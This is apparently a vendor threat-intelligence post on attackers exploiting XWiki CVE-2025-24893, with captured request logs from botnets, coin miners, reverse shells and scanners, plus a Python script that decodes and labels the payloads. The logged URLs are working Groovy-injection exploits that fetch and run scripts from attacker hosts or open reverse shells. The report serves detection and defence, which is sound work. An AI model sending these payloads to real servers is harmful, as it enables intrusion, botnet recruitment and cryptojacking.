Key Takeaways
On October 28, we published XWiki CVE-2025-24893 Exploited in the Wild detailing an attacker abusing internet-exposed XWiki servers. Two days later, on October 30, CVE-2025-24893 was added to CISA Known Exploited Vulnerabilities (KEV). Since then, we’ve observed a noticeable uptick in exploit attempts.
Canary Intelligence Observed CVE-2025-24893 Attacks (Oct. 28 - Nov. 11, 2025)
Our Canary Intelligence shows not only an increase in scanning activity but also a clear expansion of active exploitation. In the following sections, we’ll share some of what we’re seeing.
Attacks with Secondary Payload
We saw a sharp uptick in attacks when the RondoDox botnet added this vulnerability to its repertoire. The first RondoDox exploit was observed on November 3, 2025, and activity has grown steadily since.
These attacks are easily attributed to RondoDox based on its well-known HTTP User-Agent and secondary payload naming convention (rondo.<value>.sh). The associated payload servers are also well documented. For example, 74.194.191.52 can be seen below in a RondoDox exploitation of CVE-2025-24893:
{
"src_ip": "45.153.34.156",
"src_port": 42772,
"src_country": "NL",
"dst_country": "US",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
"http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-12T13:24:31.044Z"
}
RondoDox isn’t the only actor exploiting this bug. Beginning on November 7, 2025, we observed 172.245.241.123 download a payload from ospwrf10ny.anondns[.]net and pipe it to bash. The payload is lightly obfuscated: the attacker base64 encodes it, but the encoded script remains visible in the request URL, as is typical with this vulnerability. Below is an example of that November 7 exploitation:
{
"src_ip": "172.245.241.123",
"src_port": 53672,
"src_country": "IE",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%27echo%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%2BJi0KfQpfX2N1cmwgaHR0cDovL29zcHdyZjEwbnkuYW5vbmRucy5uZXQgfCBiYXNoCg%3D%3D%20%7C%20base64%20-d%20%7C%20bash%27.execute%28%29.text%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "Mozilla/5.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-07T09:42:43.964Z"
}
The obfuscated payload downloads a secondary payload which in turn fetches and executes a coin miner (file hash: 03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7).
There is no lack of coin miner activity. On November 7, 2025, 156.146.56.131 fetched a secondary payload from 47.236.194.231:81 (the host is now offline). The secondary payload was executed in a second-pass exploit, as discussed in XWiki CVE-2025-24893 Exploited in the Wild.
{
"src_ip": "156.146.56.131",
"src_port": 45580,
"src_country": "SG",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22curl%20http://47.236.194.231:81/setup_runnv_miner.sh%20-o%20/tmp/123.sh%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "python-requests/2.28.1",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-07T11:06:37.631Z"
}
The attacker from XWiki CVE-2025-24893 Exploited in the Wild appears to have expanded their efforts. In addition to the two IP addresses documented previously, they’ve added new payload hosting servers at 185.142.33.151 and 90.156.218.31. They’re also now launching exploits from 172.206.196.45.
{
"src_ip": "172.206.196.45",
"src_port": 33928,
"src_country": "US",
"dst_country": "CA",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0 Safari/537.36",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-10T23:11:32.847Z"
}
Reverse Shells
We’ve also observed several reverse shell attempts. These may indicate "hands-on-keyboard" activity, or they could represent a different form of automation intended to avoid HTTP-based communication.
On October 31, 2025, 18.228.3.224 attempted to establish a reverse shell back to itself using the BusyBox nc binary. Unlike many of the addresses we’ve talked about so far, 18.228.3.224 is notable in that it's an AWS-associated IP address with no clear history of abuse. We’ll revisit this address’s scanning behavior in the next section, but it likely represents a more targeted attack.
{
"src_ip": "18.228.3.224",
"src_port": 37348,
"src_country": "BR",
"dst_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "python-requests/2.32.4",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T10:16:30.275Z"
}
Among the other reverse shell attempts we saw, on November 11, 2025, 118.99.141.178 attempted to establish a bash reverse shell to 155.138.212.170:9001. The source host, 118.99.141.178, is notable because it exposes both QNAP and DrayTek interfaces to the internet, suggesting that this could be an exploited host. This assessment is supported by our IP Intel product, which had been tracking the address as potentially vulnerable to QNAP’s CVE-2023-47218.
{
"src_ip": "118.99.141.178",
"src_port": 57717,
"src_country": "TW",
"dest_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0RwcmludGxuKCUyMiUyRmJpbiUyRmJhc2grLWkrJTNFJTI2KyUyRmRldiUyRnRjcCUyRjE1NS4xMzguMjEyLjE3MCUyRjkwMDErMCUzRSUyNjElMjIuZXhlY3V0ZSgpLnRleHQpJTdCJTdCJTJGZ3Jvb3Z5JTdEJTdEJTdCJTdCJTJGYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F155.138.212.170%2F9001+0%3E%261%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
"http_user_agent": "python-requests/2.32.5",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-11T11:00:14.603Z"
}
Scanners and Probing
Beyond reverse shells, plenty of actors are simply looking for targets, which is why we’ve seen a variety of scanners and probes from attackers. The most interesting one is an out-of-band application security testing (OAST)-based scanner using oast.fun, often associated with Nuclei and similar tools. This sort of traffic usually makes analysts’ eyes glaze over due to the sheer volume of internet-wide probing.
However, one oast.fun payload we captured stood out for two reasons. First, as we will see, the Nuclei template for CVE-2025-24893 doesn’t use an OAST-based check, suggesting the payload came from a less common tool. Second, the attacker, 18.228.3.224, also attempted a reverse shell (see the previous section), indicating this activity may be more deliberate than routine scanning.
{
"src_ip": "18.228.3.224",
"src_port": 35900,
"src_country": "BR",
"dst_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJjdXJsJTIwa3NkdXFlcWtzZ3l3bnNvaXl3c2c4OWVxbzB4cnRlbHBhLm9hc3QuZnVuLzIlMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22curl%20ksduqeqksgywnsoiywsg89eqo0xrtelpa.oast.fun/2%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "python-requests/2.32.4",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T10:28:30.367Z"
}
Of course, we’ve seen an increase in Nuclei scans as well. The Nuclei template for CVE-2025-24893 outputs the results of cat /etc/passwd. We see quite a bit of this from many sources:
{
"src_ip": "35.194.0.176",
"src_port": 37256,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T18:18:18.243Z"
}
We also observed probes using id, whoami, and just generic printing of “EXPLOIT_SUCCESS.” All are viable approaches, but a bit off the beaten Nuclei path.
{
"src_ip": "186.188.17.2",
"src_port": 46356,
"src_country": "VE",
"dst_country": "IN",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute().text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20",
"http_user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-03T13:14:03.016Z"
}
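As an added triage example (not VulnCheck's code), the Python below decodes the SolrSearch `text` parameter from records shaped like those above, recovers the Groovy macro body and any base64 stage hidden behind `echo ... | base64 -d`, and labels the payload as downloader, reverse shell, OAST probe or recon. The sample URLs are constructed on TEST-NET addresses, and the rule set is an assumption rather than a VulnCheck signature.

```python
import base64, binascii, re
from urllib.parse import parse_qs, quote, urlparse

# Groovy body inside the {{async}}{{groovy}} wrapper every record above uses.
GROOVY_RE = re.compile(r"\{\{groovy\}\}(.*?)\{\{/groovy\}\}", re.I | re.S)
# "echo <base64> | base64 -d | bash" staging, as in the anondns record.
B64_STAGE_RE = re.compile(r"echo\s+'?([A-Za-z0-9+/=]{16,})'?\s*\|\s*base64\s+-d", re.I)
# Ordered triage rules (assumed): first match wins, so an OAST callback beats the downloader rule.
RULES = [
    ("reverse_shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s", re.I)),
    ("oast_probe", re.compile(r"\.oast\.(fun|pro|live|site|me|online)\b|interact\.sh", re.I)),
    ("downloader", re.compile(r"\b(wget|curl)\b", re.I)),
    ("recon", re.compile(r"\b(id|whoami|uname)\b|cat\s+/etc/passwd|EXPLOIT_SUCCESS", re.I)),
]

def extract_groovy(url: str) -> "str | None":
    """Decoded Groovy body from the SolrSearch ?text= parameter, or None if no macro is present."""
    text = parse_qs(urlparse(url).query).get("text", [""])[0]  # percent-decodes and maps '+' to space
    m = GROOVY_RE.search(text)
    return m.group(1) if m else None

def decode_stage(body: str) -> str:
    """Decode the base64 stage behind 'echo ... | base64 -d'; '' if absent or malformed."""
    m = B64_STAGE_RE.search(body)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace") if m else ""
    except (binascii.Error, ValueError):
        return ""

def classify(url: str) -> dict:
    """Triage one request URL into the Groovy body, any decoded stage and a label."""
    body = extract_groovy(url)
    stage = decode_stage(body or "")
    label = "no_groovy_macro" if body is None else next(
        (name for name, rx in RULES if rx.search(body + "\n" + stage)), "unknown")
    return {"groovy": body, "stage": stage, "label": label}

def make_url(groovy_body: str) -> str:
    """Build a request shaped like the records above; used only for the constructed samples."""
    wrapped = "}}}{{async async=false}}{{groovy}}" + groovy_body + "{{/groovy}}{{/async}}"
    return "/xwiki/bin/get/Main/SolrSearch?media=rss&text=" + quote(wrapped, safe="")

# Constructed samples on TEST-NET addresses: same shapes as the observed records, not real hosts.
_STAGE = base64.b64encode(b"curl http://203.0.113.10/stage2.sh | bash\n").decode()
SAMPLES = {
    "downloader": make_url("['sh', '-c', 'wget -qO- http://203.0.113.10/rondo.test.sh|sh'].execute().text"),
    "b64_stage": make_url(f"println('echo {_STAGE} | base64 -d | bash'.execute().text)"),
    "reverse_shell": make_url('"busybox nc 203.0.113.10 8443 -e /bin/bash".execute()'),
    "oast_probe": make_url('"curl abcdefghijklmnop.oast.fun/2".execute()'),
    "recon": make_url('println("cat /etc/passwd".execute().text)'),
}
```

Run `classify()` over the `http.url` field of each record to get a label alongside the decoded command, which is what an analyst wants in the alert rather than the raw percent-encoded string.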
Conclusion
CVE-2025-24893 is a familiar story: one attacker moves first, and many follow. Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale. By the time an issue lands in CISA KEV, attackers are already days ahead, and early detection remains the only real advantage defenders have. VulnCheck’s Canary Intelligence caught these attacks before they reached broader awareness, giving defenders a chance to respond before exploitation became widespread.
About VulnCheck
The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and curate. For more research like this, see XWiki CVE-2025-24893 Exploited in the Wild, VulnCheck Research Highlights: October 2025, and New Citrix NetScaler Zero-Day Vulnerability Exploited in the Wild.
Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, and Exploit & Vulnerability Intelligence products.